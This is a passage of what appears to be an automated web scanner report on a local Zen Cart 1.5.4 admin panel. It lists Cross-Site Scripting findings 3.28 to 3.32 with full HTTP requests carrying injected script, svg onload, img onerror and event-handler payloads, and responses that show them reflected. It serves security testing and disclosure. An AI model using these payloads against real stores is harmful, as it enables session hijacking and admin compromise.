Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------244472214220682
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------244472214220682
Content-Disposition: form-data; name="products_model"

testval
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------244472214220682
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------244472214220682
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------244472214220682
Content-Disposition: form-data; name="image_delete"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="overwrite"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[1]"

>"><script>alert(14405309.57587)</script>
-----------------------------244472214220682
Content-Disposition: form-data; name="products_weight"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="search"

test
-----------------------------244472214220682--



HTTP Response
----Truncated due to large size ---
 
"100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">test        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.57587)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" /><input type="hidden" name="products_date_added" value="2015-08-25 18:42:30" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input 



Finding 3.28:  Cross-Site Scripting.

Current injection value: <sVg/OnLOaD=prompt(14405309.60937)>

Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=add_product_attributes&attribute_page=1&products_filter=3
Injected item: POST : attributes_default
Injection value: c3p0z14405309.60987r2d2z

Reflection URI: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1
Detection string: alert(14405309.60987)


HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------7551144032618
Content-Length: 4987

-----------------------------7551144032618
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------7551144032618
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------7551144032618
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------7551144032618
Content-Disposition: form-data; name="x"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="y"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="master_category"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------7551144032618
Content-Disposition: form-data; name="products_status"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------7551144032618
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------7551144032618
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------7551144032618
Content-Disposition: form-data; name="products_model"

testval
-----------------------------7551144032618
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------7551144032618
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------7551144032618
Content-Disposition: form-data; name="image_delete"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="overwrite"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------7551144032618
Content-Disposition: form-data; name="products_weight"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="search"

test
-----------------------------7551144032618
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------7551144032618
Content-Disposition: form-data; name="products_description[2]"

<sVg/OnLOaD=prompt(14405309.60937)>
-----------------------------7551144032618
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------7551144032618
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------7551144032618
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------7551144032618
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------7551144032618
Content-Disposition: form-data; name="products_image"

3ds/25
-----------------------------7551144032618
Content-Disposition: form-data; name="search"

test
-----------------------------7551144032618--



HTTP Response 
----Truncated due to large size ---

                <td class="dataTableHeadingContent" align="left">Model</td>
                <td class="dataTableHeadingContent" align="right">Price/Special/Sale</td>
                <td class="dataTableHeadingContent" align="right">&nbsp;</td>
                <td class="dataTableHeadingContent" align="right">Quantity&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableHeadingContent" width="50" align="center">Status</td>
                <td class="dataTableHeadingContent" align="right">Sort</td>
                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test'">
                <td class="dataTableContent" width="20" align="right">1</td>
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&pID=1&action=new_product_preview&read=only&product_type=1&page=1"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbsp;'"--></style></sCriPt><sCriPt>alert(14405309.60987)</sCriPt></td>
                <td class="dataTableContent">testval</td>
                <td colspan="2" class="dataTableContent" align="right">$12.00</td>
                <td class="dataTableContent" align="right">1222110</td>
                <td class="dataTableContent" width="50" align="left">
<form name="setflag_products" action="http://localhost:8081/zen-cart/admin1/categories.php?action=setflag&pID=1&cPath=1&page=1&search=test" method="post"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />        <input type="image" src="images/icon_red_on.gif" title="Status - Disabled"/>
        <input type="hidden" name="flag" value="1" />
        </form>
&nbsp;&nbsp;<img src="images/icon_yellow_on.gif" border="0" alt="Product is Linked" title=" Product is Linked "><br>                </td>
                <td class="dataTableContent" align="right">0</td>
                <td class="dataTableContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product&search=test">


Finding 3.29:  Cross-Site Scripting. Persistent XSS found in current scan.

Current injection value: c3p0z1a2a3ar2d2z

Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=add_product_attributes&attribute_page=1&products_filter=3
Injected item: POST : product_attribute_is_free
Injection value: <sVg/OnLOaD=prompt(14405309.61147)>

Reflection URI: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=c3p0z1a2a3ar2d2z&pID=1&action=update_product&page=1
Detection string: alert(14405309.61147)


HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=c3p0z1a2a3ar2d2z&pID=1&action=update_product&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------7551144032618
Content-Length: 4964

-----------------------------7551144032618
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------7551144032618
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------7551144032618
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------7551144032618
Content-Disposition: form-data; name="x"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="y"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="master_category"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------7551144032618
Content-Disposition: form-data; name="products_status"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------7551144032618
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------7551144032618
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------7551144032618
Content-Disposition: form-data; name="products_model"

testval
-----------------------------7551144032618
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------7551144032618
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------7551144032618
Content-Disposition: form-data; name="image_delete"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="overwrite"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------7551144032618
Content-Disposition: form-data; name="products_weight"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="search"

test
-----------------------------7551144032618
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------7551144032618
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------7551144032618
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------7551144032618
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------7551144032618
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------7551144032618
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------7551144032618
Content-Disposition: form-data; name="products_image"

3ds/25
-----------------------------7551144032618
Content-Disposition: form-data; name="search"

test
-----------------------------7551144032618--



HTTP Response 
----Truncated due to large size ---

<td class="dataTableHeadingContent">Categories / Products</td>
                <td class="dataTableHeadingContent" align="left">Model</td>
                <td class="dataTableHeadingContent" align="right">Price/Special/Sale</td>
                <td class="dataTableHeadingContent" align="right">&nbsp;</td>
                <td class="dataTableHeadingContent" align="right">Quantity&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableHeadingContent" width="50" align="center">Status</td>
                <td class="dataTableHeadingContent" align="right">Sort</td>
                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test'">
                <td class="dataTableContent" width="20" align="right">1</td>
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&pID=1&action=new_product_preview&read=only&product_type=1&page=1"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbsp;<! XSS="><img src=xx:x onerror=alert(14405309.61147)//"></td>
                <td class="dataTableContent">testval</td>
                <td colspan="2" class="dataTableContent" align="right">$12.00</td>
                <td class="dataTableContent" align="right">1222110</td>
                <td class="dataTableContent" width="50" align="left">
<form name="setflag_products" action="http://localhost:8081/zen-cart/admin1/categories.php?action=setflag&pID=1&cPath=1&page=1&search=test" method="post"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />        <input type="image" src="images/icon_red_on.gif" title="Status - Disabled"/>
        <input type="hidden" name="flag" value="1" />
        </form>

		
Finding 3.30:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_name[1]
Injection value: <! XSS="><img src=xx:x onerror=alert(14405309.61147)//">
Detection value: alert(14405309.61147)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------7551144032618
Content-Length: 5015

-----------------------------7551144032618
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------7551144032618
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------7551144032618
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------7551144032618
Content-Disposition: form-data; name="x"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="y"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="master_category"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------7551144032618
Content-Disposition: form-data; name="products_status"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------7551144032618
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------7551144032618
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------7551144032618
Content-Disposition: form-data; name="products_model"

testval
-----------------------------7551144032618
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------7551144032618
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------7551144032618
Content-Disposition: form-data; name="image_delete"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="overwrite"

1
-----------------------------7551144032618
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------7551144032618
Content-Disposition: form-data; name="products_weight"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------7551144032618
Content-Disposition: form-data; name="search"

test
-----------------------------7551144032618
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------7551144032618
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------7551144032618
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------7551144032618
Content-Disposition: form-data; name="products_name[1]"

<! XSS="><img src=xx:x onerror=alert(14405309.61147)//">
-----------------------------7551144032618
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------7551144032618
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------7551144032618
Content-Disposition: form-data; name="products_image"

3ds/25
-----------------------------7551144032618
Content-Disposition: form-data; name="search"

test
-----------------------------7551144032618--



HTTP Response
----Truncated due to large size ---
 
nt" align="right">&nbsp;</td>
                <td class="dataTableHeadingContent" align="right">Quantity&nbsp;&nbsp;&nbsp;</td>
                <td class="dataTableHeadingContent" width="50" align="center">Status</td>
                <td class="dataTableHeadingContent" align="right">Sort</td>
                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test'">
                <td class="dataTableContent" width="20" align="right">1</td>
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&pID=1&action=new_product_preview&read=only&product_type=1&page=1"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbsp;<! XSS="><img src=xx:x onerror=alert(14405309.61147)//"></td>
                <td class="dataTableContent">testval</td>
                <td colspan="2" class="dataTableContent" align="right">$12.00</td>
                <td class="dataTableContent" align="right">1222110</td>
                <td class="dataTableContent" width="50" align="left">
<form name="setflag_products" action="http://localhost:8081/zen-cart/admin1/categories.php?action=setflag&pID=1&cPath=1&page=1&search=test" method="post"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />        <input type="image" src="images/icon_red_on.gif" title="Status - Disabled"/>
        <input type="hidden" name="flag" value="1" />
        </form>
&nbsp;&nbsp;<img src="images/icon_yellow_on.gif" border="0" alt="Product is Linked" title=" Product is Linked "><br>                </td>
                <td class="dataTableContent" align="right">0</td>
                <td class="dataTableContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin



Finding 3.31:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: GET: search
Injection value: x" onmousemove="alert(14405309.61577)
Detection value: x" onmousemove="alert(14405309.61577)

HTTP Request 

GET /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=x" onmousemove="alert(14405309.61577)&vcheck=yes HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
X-Cenzic-Spider-Send-HeadRequest: true
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4




HTTP Response
----Truncated due to large size --- 

<tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="products_name[2]" /><input type="hidden" name="products_description[2]" /><input type="hidden" name="products_url[2]" /><input type="hidden" name="products_name[1]" /><input type="hidden" name="products_description[1]" /><input type="hidden" name="products_url[1]" /><input type="hidden" name="products_image" value="3ds/25" /><input type="hidden" name="search" value="x&quot; onmousemove=&quot;alert(14405309.61577)" /><input type="image" src="includes/languages/english/images/buttons/button_back.gif" border="0" alt="Back" title=" Back " name="edit">&nbsp;&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update ">&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/categories.php?cPath=1&pID=1&page=1&search=x" onmousemove="alert(14405309.61577)"><img src="includes/languages/english/images/buttons/button_cancel.gif" border="0" alt="Cancel" title=" Cancel "></a>        </td>
      </tr>
    </table></form>
    </td>
<!-- body_text_eof //-->
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
<br />
</body>
</html>

Finding 3.32:  Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[2]
Injection value: <script>alert(14405309.65177)</script>
Detection value: <script>alert(14405309.65177)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------32072267314898
Content-Length: 4975

-----------------------------32072267314898
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="master_category"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------32072267314898
Content-Disposition: form-data; name="products_status"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------32072267314898
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------32072267314898
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[2]"

<script>alert(14405309.65177)</script>
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------32072267314898
Content-Disposition: form-data; name="products_model"

testval
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------32072267314898
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------32072267314898
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------32072267314898
Content-Disposition: form-data; name="image_delete"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="overwrite"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_weight"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="search"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="x"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="y"

0
-----------------------------32072267314898--



HTTP Response
----Truncated due to large size ---
 
pes</a></li>
              </ul>
    </li>
      </ul>
</div>
